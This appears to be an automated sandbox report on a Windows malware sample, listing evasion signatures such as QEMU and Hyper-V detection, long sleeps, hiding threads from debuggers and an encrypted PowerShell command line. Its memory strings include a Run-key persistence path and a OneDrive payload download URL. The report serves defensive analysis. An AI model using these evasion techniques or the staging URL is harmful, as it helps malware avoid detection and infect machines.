Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSHTML.TLB
Source: CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNAVELHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=2B80EFEE51D0620B&RESID=2B80EFEE51D0620B%21266&AUTHKEY=AEVBDMTSNRE7SUK
Source: powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*>
Source: powershell.exe, 00000019.00000002.268353551843.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: powershell.exe, 0000000A.00000002.266609655269.00000000081AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461378860.00000000081A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 1124 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4500 Thread sleep count: 7742 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4540 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep count: 8803 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1404 Thread sleep count: 7658 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6884 Thread sleep count: 51 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe TID: 384 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1564 Thread sleep count: 7843 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep count: 77 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7364 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kxeayl3s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3rumnuxb.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kar5iszo.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7403 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 370 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 873 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: foregroundWindowGot 418 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: foregroundWindowGot 1206 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7742
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8803
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7658
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7843
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*>
Source: powershell.exe, 00000019.00000002.268353551843.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=Software\Microsoft\Windows\CurrentVersion\RunAvelhttps://onedrive.live.com/download?cid=2B80EFEE51D0620B&resid=2B80EFEE51D0620B%21266&authkey=AEVbDmTsnre7suk
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000022.00000002.268392159029.0000000001158000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268394477912.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268402634074.0000000001275000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401084795.00000000011DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\mshtml.tlb
Source: CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: powershell.exe, 0000000A.00000002.266609655269.00000000081AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461378860.00000000081A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
